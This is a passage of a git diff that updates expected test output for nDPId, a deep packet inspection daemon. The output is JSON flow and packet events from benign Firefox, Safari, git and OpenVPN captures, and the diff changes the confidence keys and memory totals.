+00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1581109488041,"flow_last_seen":1581109488081,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1581109488081,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00963{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1581109488041,"flow_last_seen":1581109488123,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1581109488123,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"3653a20186a5b490426131a611e01992","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01165{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1581109488041,"flow_last_seen":1581109488123,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3397,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1581109488123,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"www.ntop.org","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"3653a20186a5b490426131a611e01992","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=www.ntop.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"DB:A7:E4:3E:6D:BB:21:AB:68:47:35:E8:0B:8F:15:DF:DB:C7:C9:6F"}} +00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":667,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":667,"flow_first_seen":1581109488041,"flow_last_seen":1581109496480,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":414073,"flow_avg_l4_payload_len":620,"midstream":0,"thread_ts_msec":1581109496480,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53096,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} 00565{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":667,"source":"443-firefox.pcap","alias":"nDPId-test","packets-captured":667,"packets-processed":667,"total-skipped-flows":0,"total-l4-payload-len":414073,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1581109496480} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 667/667 @@ -17,9 +17,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5893756 bytes -~~ total memory freed........: 5893756 bytes -~~ total allocations/frees...: 118788/118788 +~~ total memory allocated....: 6027390 bytes +~~ total memory freed........: 6027390 bytes +~~ total allocations/frees...: 121550/121550 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 467 chars ~~ json string max len.......: 1170 chars diff --git a/test/results/443-git.pcap.out b/test/results/443-git.pcap.out index 353a5b89d..f5ee702da 100644 --- a/test/results/443-git.pcap.out +++ b/test/results/443-git.pcap.out @@ -4,10 +4,10 @@ 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1581113657633,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1581113657633,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGeqzAqAENjFJyBNnAAbv0\/p5\/AAAAALAC\/\/+NzAAAAgQFtAEDAwUBAQgKHmpbwAAAAAAEAgAA"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1581113657744,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1581113657744,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIGiLCMUnIEwKgBDQG72cCAzdDM9P6egKASb0C\/0wAAAgQFnAQCCAoOCxAaHmpbwAEDAwo="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1581113657744,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1581113657744,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGerjAqAENjFJyBNnAAbv0\/p6AgM3QzYAQECpNNAAAAQEICh5qXC0OCxAa"} -00847{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1581113657633,"flow_last_seen":1581113657751,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1581113657751,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"140.82.114.4","src_port":55744,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"github.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} -00903{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1581113657633,"flow_last_seen":1581113657863,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1424,"flow_tot_l4_payload_len":1941,"flow_avg_l4_payload_len":388,"midstream":0,"thread_ts_msec":1581113657863,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"140.82.114.4","src_port":55744,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"github.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} -01207{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1581113657633,"flow_last_seen":1581113657863,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1424,"flow_tot_l4_payload_len":4067,"flow_avg_l4_payload_len":581,"midstream":0,"thread_ts_msec":1581113657863,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"140.82.114.4","src_port":55744,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"github.com","server_names":"github.com,www.github.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Extended Validation Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=github.com","alpn":"http\/1.1","fingerprint":"CA:06:F5:6B:25:8B:7A:0D:4F:2B:05:47:09:39:47:86:51:15:19:84"}} -00694{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":70,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":70,"flow_first_seen":1581113657633,"flow_last_seen":1581113658456,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1424,"flow_tot_l4_payload_len":32585,"flow_avg_l4_payload_len":465,"midstream":0,"thread_ts_msec":1581113658456,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"140.82.114.4","src_port":55744,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"}} +00847{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1581113657633,"flow_last_seen":1581113657751,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1581113657751,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"140.82.114.4","src_port":55744,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"github.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00903{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1581113657633,"flow_last_seen":1581113657863,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1424,"flow_tot_l4_payload_len":1941,"flow_avg_l4_payload_len":388,"midstream":0,"thread_ts_msec":1581113657863,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"140.82.114.4","src_port":55744,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"github.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} +01207{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1581113657633,"flow_last_seen":1581113657863,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1424,"flow_tot_l4_payload_len":4067,"flow_avg_l4_payload_len":581,"midstream":0,"thread_ts_msec":1581113657863,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"140.82.114.4","src_port":55744,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"github.com","server_names":"github.com,www.github.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Extended Validation Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=github.com","alpn":"http\/1.1","fingerprint":"CA:06:F5:6B:25:8B:7A:0D:4F:2B:05:47:09:39:47:86:51:15:19:84"}} +00694{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":70,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":70,"flow_first_seen":1581113657633,"flow_last_seen":1581113658456,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1424,"flow_tot_l4_payload_len":32585,"flow_avg_l4_payload_len":465,"midstream":0,"thread_ts_msec":1581113658456,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"140.82.114.4","src_port":55744,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"}} 00557{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":70,"source":"443-git.pcap","alias":"nDPId-test","packets-captured":70,"packets-processed":70,"total-skipped-flows":0,"total-l4-payload-len":32585,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1581113658456} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 70/70 @@ -17,9 +17,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5879899 bytes -~~ total memory freed........: 5879899 bytes -~~ total allocations/frees...: 118192/118192 +~~ total memory allocated....: 6013533 bytes +~~ total memory freed........: 6013533 bytes +~~ total allocations/frees...: 120954/120954 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 463 chars ~~ json string max len.......: 1212 chars diff --git a/test/results/443-opvn.pcap.out b/test/results/443-opvn.pcap.out index 75104c093..12419df9c 100644 --- a/test/results/443-opvn.pcap.out +++ b/test/results/443-opvn.pcap.out @@ -4,8 +4,8 @@ 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"443-opvn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1581153175528,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1581153175528,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+EfAqAFUwAzAZ87tBKpga1quAAAAALAC\/\/\/PlAAAAgQFtAEDAwUBAQgKFg2AOQAAAAAEAgAA"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"443-opvn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1581153175550,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1581153175550,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADYGAkzADMBnwKgBVASqzu1gWZU1YGtar6AScSBwigAAAgQFrAQCCAocQO0VFg2AOQEDAwY="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"443-opvn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1581153175550,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1581153175550,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+FPAqAFUwAzAZ87tBKpga1qvYFmVNoAQECwALgAAAQEIChYNgE0cQO0V"} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"443-opvn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1581153175528,"flow_last_seen":1581153176626,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1581153176626,"l3_proto":"ip4","src_ip":"192.168.1.84","dst_ip":"192.12.192.103","src_port":52973,"dst_port":1194,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} -00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":46,"source":"443-opvn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":46,"flow_first_seen":1581153175528,"flow_last_seen":1581153184491,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":8517,"flow_avg_l4_payload_len":185,"midstream":0,"thread_ts_msec":1581153184491,"l3_proto":"ip4","src_ip":"192.168.1.84","dst_ip":"192.12.192.103","src_port":52973,"dst_port":1194,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"443-opvn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1581153175528,"flow_last_seen":1581153176626,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1581153176626,"l3_proto":"ip4","src_ip":"192.168.1.84","dst_ip":"192.12.192.103","src_port":52973,"dst_port":1194,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} +00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":46,"source":"443-opvn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":46,"flow_first_seen":1581153175528,"flow_last_seen":1581153184491,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":8517,"flow_avg_l4_payload_len":185,"midstream":0,"thread_ts_msec":1581153184491,"l3_proto":"ip4","src_ip":"192.168.1.84","dst_ip":"192.12.192.103","src_port":52973,"dst_port":1194,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} 00556{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":46,"source":"443-opvn.pcap","alias":"nDPId-test","packets-captured":46,"packets-processed":46,"total-skipped-flows":0,"total-l4-payload-len":8517,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1581153184491} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 46/46 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5872825 bytes -~~ total memory freed........: 5872825 bytes -~~ total allocations/frees...: 118161/118161 +~~ total memory allocated....: 6006459 bytes +~~ total memory freed........: 6006459 bytes +~~ total allocations/frees...: 120923/120923 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 464 chars ~~ json string max len.......: 689 chars diff --git a/test/results/443-safari.pcap.out b/test/results/443-safari.pcap.out index a0c43d4f8..4eceebd94 100644 --- a/test/results/443-safari.pcap.out +++ b/test/results/443-safari.pcap.out @@ -4,10 +4,10 @@ 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1581109359601,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1581109359601,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGAULAqAENsj7Fgs8nAbvmgoUNAAAAALAC\/\/+6MQAAAgQFtAEDAwUBAQgKHinouAAAAAAEAgAA"} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1581109359639,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1581109359639,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGDUayPsWCwKgBDQG7zyeqmyMX5oKFDqAS\/ogx6QAAAgQFrAQCCAolLqfYHinouAEDAwc="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1581109359639,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1581109359639,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGAU7AqAENsj7Fgs8nAbvmgoUOqpsjGIAQECxO5AAAAQEICh4p6N4lLqfY"} -00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1581109359601,"flow_last_seen":1581109359641,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1581109359641,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53031,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -00941{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1581109359601,"flow_last_seen":1581109359683,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1673,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1581109359683,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53031,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"f9fcb52580329fb6a9b61d7542087b90","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -01143{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1581109359601,"flow_last_seen":1581109359683,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3113,"flow_avg_l4_payload_len":444,"midstream":0,"thread_ts_msec":1581109359683,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53031,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"www.ntop.org","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"f9fcb52580329fb6a9b61d7542087b90","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=www.ntop.org","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"DB:A7:E4:3E:6D:BB:21:AB:68:47:35:E8:0B:8F:15:DF:DB:C7:C9:6F"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1581109359601,"flow_last_seen":1581109360696,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":17203,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1581109360696,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53031,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} +00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1581109359601,"flow_last_seen":1581109359641,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1581109359641,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53031,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": 